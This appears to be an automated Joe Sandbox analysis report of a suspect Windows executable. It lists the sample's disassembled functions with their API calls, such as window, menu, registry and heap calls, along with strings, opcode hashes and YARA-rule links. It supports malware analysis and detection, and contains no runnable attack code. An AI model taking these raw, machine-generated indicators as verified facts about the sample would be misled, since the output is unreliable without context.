                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString$ClearVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3349467263-0
                                                                                                                                              • Opcode ID: 84b6905a04f3cbe8a5a89647b25fc7c97e8888fb23e746bbd921fa75cfd3bebd
                                                                                                                                              • Instruction ID: ac7c056ca3fef7ea1f7cd9142080b8837a63ee409403f1a6f7d78ffac25b1746
                                                                                                                                              • Opcode Fuzzy Hash: 84b6905a04f3cbe8a5a89647b25fc7c97e8888fb23e746bbd921fa75cfd3bebd
                                                                                                                                              • Instruction Fuzzy Hash: 4A519F71E00319EFCF20EFA4E884AEEBBB9BF04300F90452AF551A7151D7789945CB98
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004241E6 Relevance: 10.6, APIs: 7, Instructions: 115windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 00424214
                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042423B
                                                                                                                                              • UpdateWindow.USER32(?), ref: 00424255
                                                                                                                                              • SendMessageA.USER32(?,00000121,00000000,?), ref: 00424279
                                                                                                                                              • SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 00424293
                                                                                                                                              • UpdateWindow.USER32(?), ref: 004242D9
                                                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0042430D
                                                                                                                                                • Part of subcall function 0042663C: GetWindowLongA.USER32(?,000000F0), ref: 00426648
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Window$PeekSendUpdate$LongParent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2853195852-0
                                                                                                                                              • Opcode ID: 443e82fd054304042dfa914eb5858c3173381fb830609d78dbd8dc54ea1c93a7
                                                                                                                                              • Instruction ID: 89365fabb3662f47a8456e8abc8f74eacdd1bee40569780c245ffab03503297d
                                                                                                                                              • Opcode Fuzzy Hash: 443e82fd054304042dfa914eb5858c3173381fb830609d78dbd8dc54ea1c93a7
                                                                                                                                              • Instruction Fuzzy Hash: 5941E430304360DFD721DF22EC44A2BBAF4FFD1B98F90097EF481921A1C7699849C62A
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004019F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetSystemMenu.USER32(?,00000000,?,?,?,?,?,0042DD38,000000FF), ref: 00401A16
                                                                                                                                              • AppendMenuA.USER32(?,00000800,00000000,00000000), ref: 00401A7D
                                                                                                                                              • AppendMenuA.USER32(?,00000000,00000010,00000010), ref: 00401A88
                                                                                                                                                • Part of subcall function 00401820: FindResourceA.KERNEL32(?,?,00000006), ref: 0040183A
                                                                                                                                              • SendMessageA.USER32(?,00000080,00000001,?), ref: 00401AC5
                                                                                                                                              • SendMessageA.USER32(?,00000080,00000000,?), ref: 00401AD9
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$AppendMessageSend$FindResourceSystem
                                                                                                                                              • String ID: user-12345678
                                                                                                                                              • API String ID: 858472958-2755188220
                                                                                                                                              • Opcode ID: c756d84365dae25f8462fd63b73cac35b8282b64e018d40d228abaed280fe13c
                                                                                                                                              • Instruction ID: 3b30e15d64c7f474da2be64c65720a04101d9d6b3a2cd516c52670f7795c8fad
                                                                                                                                              • Opcode Fuzzy Hash: c756d84365dae25f8462fd63b73cac35b8282b64e018d40d228abaed280fe13c
                                                                                                                                              • Instruction Fuzzy Hash: 84317E71340701AFD320EF65CC45F17B3A8EF88710F508A2AF5519B2D1CBB8E8058B68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 004145C5 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetWindow.USER32(?,00000002), ref: 004145E0
                                                                                                                                              • GetParent.USER32(?), ref: 004145F1
                                                                                                                                              • GetWindow.USER32(?,00000002), ref: 00414614
                                                                                                                                              • GetWindow.USER32(?,00000002), ref: 00414626
                                                                                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 00414635
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 0041464F
                                                                                                                                              • GetTopWindow.USER32(?), ref: 00414675
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$LongParentVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 506644340-0
                                                                                                                                              • Opcode ID: 45eadc8b458de43bde7c9e092fd1932caba4420e0a9f48f5c06109cc70392342
                                                                                                                                              • Instruction ID: ebd6f0984fa48f2bf8ba37bc0dad7d39dec8952187d8cbd4be4ea4dd5bc4bcd7
                                                                                                                                              • Opcode Fuzzy Hash: 45eadc8b458de43bde7c9e092fd1932caba4420e0a9f48f5c06109cc70392342
                                                                                                                                              • Instruction Fuzzy Hash: 6121F5317007216BC7306B659C09FAB77ACEFC2798F45053ABA41DB251C72CDC4686AC
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042340F Relevance: 10.6, APIs: 7, Instructions: 71registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetClassInfoA.USER32(?,?,?), ref: 0042342F
                                                                                                                                              • RegisterClassA.USER32(00000004), ref: 00423442
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Class$InfoRegister
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2278207768-0
                                                                                                                                              • Opcode ID: ae984635e655e5db520392ed793df418be20265cf8730173f5c4cd27a1fe2e35
                                                                                                                                              • Instruction ID: 0db0b4e4c4e337a484aff126d2be670c2f0469505d5c1c4381f3c1d533b8c960
                                                                                                                                              • Opcode Fuzzy Hash: ae984635e655e5db520392ed793df418be20265cf8730173f5c4cd27a1fe2e35
                                                                                                                                              • Instruction Fuzzy Hash: 8A21D831600214EFCB11EF61DD44BAE7BF8EF44715F80456AF84692150C738E606DB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042BC08 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 0042BC36
                                                                                                                                              • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0042BC59
                                                                                                                                              • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 0042BC75
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042BC85
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0042BC8F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreate$Open
                                                                                                                                              • String ID: software
                                                                                                                                              • API String ID: 1740278721-2010147023
                                                                                                                                              • Opcode ID: a07ef03d32e418125c98845893222a59e1d7b78c696368899b11d02bf983a4c5
                                                                                                                                              • Instruction ID: 64b97b5fe25ac38e929414c9c763e2fcce4b8d3dd38ef5aad07515420139dc36
                                                                                                                                              • Opcode Fuzzy Hash: a07ef03d32e418125c98845893222a59e1d7b78c696368899b11d02bf983a4c5
                                                                                                                                              • Instruction Fuzzy Hash: 0411CB76A00258FB9B21DF9ADD84CDFBFBCEF85700B5000BAA504A2111D7719A45DBA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040D05C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040D09A
                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 0040D0B2
                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 0040D0B9
                                                                                                                                              • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0040D0DD
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: System$Metrics$InfoParameterslstrcpy
                                                                                                                                              • String ID: B$DISPLAY
                                                                                                                                              • API String ID: 1409579217-3316187204
                                                                                                                                              • Opcode ID: aa875fb899d8b8cdc6035337f91c3cfdfa7e814ee4d75c511dac12003764187e
                                                                                                                                              • Instruction ID: 7d79b360eed3925eabdee55bcf9e6e46b2a378b8c0ece8e258d689888b9aa654
                                                                                                                                              • Opcode Fuzzy Hash: aa875fb899d8b8cdc6035337f91c3cfdfa7e814ee4d75c511dac12003764187e
                                                                                                                                              • Instruction Fuzzy Hash: 3211C671A00224DBCF219FA4DC8095BBBB8EF05744F408077FD09BA141C274D916CBE9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0042BF90 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000000,004282FD,?,?,?,?), ref: 0042BF99
                                                                                                                                              • SetErrorMode.KERNEL32(00000000), ref: 0042BFA1
                                                                                                                                              • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042BFEC
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 0042BFFC
                                                                                                                                                • Part of subcall function 0042BE69: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 0042BEA5
                                                                                                                                                • Part of subcall function 0042BE69: PathFindExtensionA.SHLWAPI(?), ref: 0042BEB2
                                                                                                                                                • Part of subcall function 0042BE69: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0042BF3D
                                                                                                                                                • Part of subcall function 0042BE69: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0042BF6A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorModeModule$AddressExtensionFileFindHandleNamePathProclstrcatlstrcpy
                                                                                                                                              • String ID: NotifyWinEvent$user32.dll
                                                                                                                                              • API String ID: 4004864024-597752486
                                                                                                                                              • Opcode ID: c693ce6a2e765cc9099c900ab09abb04ea83f55a69a3113b2ed044f042921076
                                                                                                                                              • Instruction ID: 8050f7acd3555061b9cb0811210370212b3dde1f57db23d13128c8b76d78117c
                                                                                                                                              • Opcode Fuzzy Hash: c693ce6a2e765cc9099c900ab09abb04ea83f55a69a3113b2ed044f042921076
                                                                                                                                              • Instruction Fuzzy Hash: 89016D75B40260DFC720EF65E904A5A3BA4EF04700F8684AFF944D7362DB78D840CBAA
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00418741 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 34COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • DeleteCriticalSection.KERNEL32(76170A60,76170A60,00000000,?,00419CD6,00419D7E,00415EBE,?,0043A478,00000060), ref: 0041875C
                                                                                                                                                • Part of subcall function 004153EC: HeapFree.KERNEL32(00000000,?,0043A458,0000000C,00418764,76170A60,?,00419CD6,00419D7E,00415EBE,?,0043A478,00000060), ref: 00415451
                                                                                                                                              • DeleteCriticalSection.KERNEL32(00000000,00000000,?,00419CD6,00419D7E,00415EBE,?,0043A478,00000060), ref: 00418786
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CriticalDeleteSection$FreeHeap
                                                                                                                                              • String ID: @ED$@ED$`FD$`FD
                                                                                                                                              • API String ID: 447823528-2709115982
                                                                                                                                              • Opcode ID: 11b09ba00ba531dec1240bf4f5251c78e4240dee3c1046bbdde13b47f6cc61b2
                                                                                                                                              • Instruction ID: df23414061cf168004c6de2c13b304607e6d267cc1c22f5936ebd44bd2e4ff4c
                                                                                                                                              • Opcode Fuzzy Hash: 11b09ba00ba531dec1240bf4f5251c78e4240dee3c1046bbdde13b47f6cc61b2
                                                                                                                                              • Instruction Fuzzy Hash: 7FF0A732D4032457EA306909ACC4BE6A2E89FD1722735403FDCB893250CB3DDCC1826D
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00426E74 Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00426E80
                                                                                                                                              • GetSysColor.USER32(00000010), ref: 00426E87
                                                                                                                                              • GetSysColor.USER32(00000014), ref: 00426E8E
                                                                                                                                              • GetSysColor.USER32(00000012), ref: 00426E95
                                                                                                                                              • GetSysColor.USER32(00000006), ref: 00426E9C
                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00426EA9
                                                                                                                                              • GetSysColorBrush.USER32(00000006), ref: 00426EB0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Color$Brush
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2798902688-0
                                                                                                                                              • Opcode ID: 217f39869b888a1c3749961ae9e7e8c44d1ab5d44a913a51842b180abdde359a
                                                                                                                                              • Instruction ID: 849f2a7d79a27e67f6fb90856910374a9d4c7919ec4fb8f2b3bca5a51304e481
                                                                                                                                              • Opcode Fuzzy Hash: 217f39869b888a1c3749961ae9e7e8c44d1ab5d44a913a51842b180abdde359a
                                                                                                                                              • Instruction Fuzzy Hash: D6F0F871A407489BD730BB729D09B47BAE1FFC4B10F42093EE2818BA90E6B6E0419F44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 025C81C2 Relevance: 9.4, APIs: 6, Instructions: 379memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025C7530: GetFileInformationByHandle.KERNEL32(?,?), ref: 025C7559
                                                                                                                                                • Part of subcall function 025C7530: GetFileInformationByHandleEx.KERNEL32(?,00000009,?,00000008), ref: 025C758C
                                                                                                                                              • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 025C825E
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 025C82DF
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025C82F0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$FreeHandleHeapInformation$Pointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1293978381-0
                                                                                                                                              • Opcode ID: dc664c260c91812ab4554c73750211dbec525b391e51e12b5801d7689d327623
                                                                                                                                              • Instruction ID: dc23025c4b355437162575c2e93ab0608df6f2f27e0ce2ac762b94bfa2d3693b
                                                                                                                                              • Opcode Fuzzy Hash: dc664c260c91812ab4554c73750211dbec525b391e51e12b5801d7689d327623
                                                                                                                                              • Instruction Fuzzy Hash: 10F1F574600B00CFD725CF69C588B66BBF2BB49314F24892DD99A8BBA1E771F845CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0040C9F9 Relevance: 9.2, APIs: 6, Instructions: 249memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • MapDialogRect.USER32(?,?), ref: 0040CA8F
                                                                                                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0040CAB0
                                                                                                                                              • CLSIDFromString.OLE32(?,?), ref: 0040CBAE
                                                                                                                                              • CLSIDFromProgID.OLE32(?,?), ref: 0040CBB6
                                                                                                                                              • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 0040CC52
                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 0040CCA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
